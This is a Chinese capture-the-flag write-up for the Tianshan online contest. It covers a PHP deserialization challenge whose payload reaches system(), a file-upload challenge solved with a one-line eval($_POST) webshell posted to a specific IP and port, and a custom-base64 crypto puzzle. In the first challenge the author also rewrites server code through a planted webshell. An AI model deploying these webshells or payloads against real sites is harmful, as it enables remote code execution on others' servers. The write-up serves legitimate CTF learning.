天山固网线上赛WP

Delete included in category CTF

2023-10-21 2023-10-21 383 words 2 minutes

web 3出2

web1 by DT

进来先看源码:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27


<?php
header("Content-type:text/html;charset=utf-8");
show_source(__FILE__);
error_reporting(0);
class Flag{
    public $a;
    public $b;
    public $c;
    public function __construct(){
        $this->a = 123123;
        $this->b = 'pwd';
        $this->arr = array();
    }

    public function __destruct(){
        echo $a;
        $this->arr[$this->a]=1;
        if ($this->arr[]=1){
            echo 'Please!!!';
            }
        else{
            system($this->b);
            }
        }
}
$was = $_GET['was'];
unserialize($was); 

发现是一个pop，然后在destruct那里做了一个array的限制那就利用int类型溢出为空的特性构造pop 利用了这个文章：https://blog.csdn.net/starttv/article/details/127905422

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


<?php
class Flag{
	public $a;
    public $b;
    public $c; 




}
$e=new Flag();
$e->$b='ls';
$e->$a=9223372036854775807;
echo serialize($e);

但是发现不行，本地调试发现没有自己调用construct函数，所以自己添加一个array再次构造pop

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


<?php
class Flag{
    public $a;
    public $b;
    public $c;
    public $arr;

}
$e=new Flag();
$e->a=9223372036854775807;
$e->arr=array();
$e->b='ls';
echo serialize($e);

发现有test.php等文件，进行查看cat

发现写了一个马子，直接上号看到了/var/www/html/sql_connect/sql-connect.php

(尝试修改了代码，没想到真的可以修改，索性直接修改源代码)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29


<?php
$dbuser = 'root';
$dbpass = 'root';
$dbname = "dascctf";
$host = '127.0.0.1';


$con = mysqli_connect($host, $dbuser, $dbpass, $dbname) or die('Could not connect to database.');


$query = "SELECT * FROM flag"; //猜的表名
$result = mysqli_query($con, $query);

if ($result) {

    while ($row = mysqli_fetch_assoc($result)) {

        foreach ($row as $key => $value) {
            echo "$key: $value<br>";
        }
    }
} else {

    echo "Query failed: " . mysqli_error($con);
}


mysqli_close($con);
?>

直接访问/sql_connect/sql-connect.php` 得到flag

web2 by D.T

进入发现有个lock，进入看看

简单的文件上传本地写一个上传马子

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


<!DOCTYPE html>
<html>
<head>
    <title>文件上传表单</title>
</head>
<body>
    <form action="http://1.14.108.193:43321/Secr3t.php" method="post" enctype="multipart/form-data">
        <label for="file">选择文件：</label>
        <input type="file" name="file" id="file">
        <input type="submit" value="上传文件">
    </form>
</body>
</html>

小马

1
2
3


<?php
eval($_POST["123"]);
?>

上传

Crypto b@se#Lulzcart

先下载文件看到密钥和base编码；

我在这里利用了往年的脚本，地址：https://blog.csdn.net/qq_58370970/article/details/123339389

先编写脚本：

1

import string s = 'YOJyHo57WlUFzCfDgjn0Sb9ET****sqVLX42kNaIhr+dtPm1u3AMKpwRGvcxQZ8B' j = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' for i in j: if i not in s: • print(i),

得到缺失的4个字符；结果：ei6/

但不知道顺序，可以通过代码整出24种不同的base64变种的排序：具体脚本：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


str="YOJyHo57WlUFzCfDgjn0Sb9ET****sqVLX42kNaIhr+dtPm1u3AMKpwRGvcxQZ8B"
ciper="jHo0gpj5qwNVs5L3/aPVq9ZpEwCX/NZIz7jVs5Xr6pZa/5oIVg"#(==没有用)
import string
import binascii
for i in string.ascii_letters+string.digits:
	if i not in str:
• print(i)
import itertools
s=['e','i','6','/']
for i in itertools.permutations(s,4):
	ss="YOJyHo57WlUFzCfDgjn0Sb9ET"+"".join(i)+"sqVLX42kNaIhr+dtPm1u3AMKpwRGvcxQZ8B"
bins = ""
for j in ciper:
	bins+=bin(ss.index(j))[2:].zfill(6)
print(binascii.unhexlify(hex(eval("0b"+bins))[2:-1]))

运行脚本：

拿到不同的flag,可是这个看起来i think you can get this flag 这个英文句子，最终flag是第二个：

DASCTF{i_th1nk_you_can_g0t_this_flag}